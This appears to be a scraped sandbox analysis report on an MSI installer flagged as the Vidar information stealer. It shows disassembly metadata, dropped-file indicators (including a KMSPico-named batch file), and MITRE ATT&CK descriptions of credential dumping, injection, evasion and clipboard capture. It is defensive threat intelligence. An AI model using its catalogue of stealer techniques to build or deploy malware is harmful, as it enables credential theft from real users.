Associated: 00000016.00000002.1657296314.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_putt.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
API String ID: 247603264-1827671502
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000016.00000002.1657146050.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.1657124376.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657166694.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657296314.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_putt.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000016.00000002.1657146050.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.1657124376.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657166694.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657296314.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_putt.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000016.00000002.1657146050.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.1657124376.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657166694.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657296314.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_putt.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000016.00000002.1657146050.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.1657124376.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657166694.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657296314.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_putt.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000016.00000002.1657146050.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.1657124376.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657166694.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657296314.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_putt.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 69633f.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\53c169.rbs

C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat

C:\ProgramData\3790H479RI5F\B1NOPH

C:\ProgramData\3790H479RI5F\U37QQIEKN

C:\ProgramData\3790H479RI5F\VSJECJ

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\din[1].exe

Windows Analysis Report
69633f.msi

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre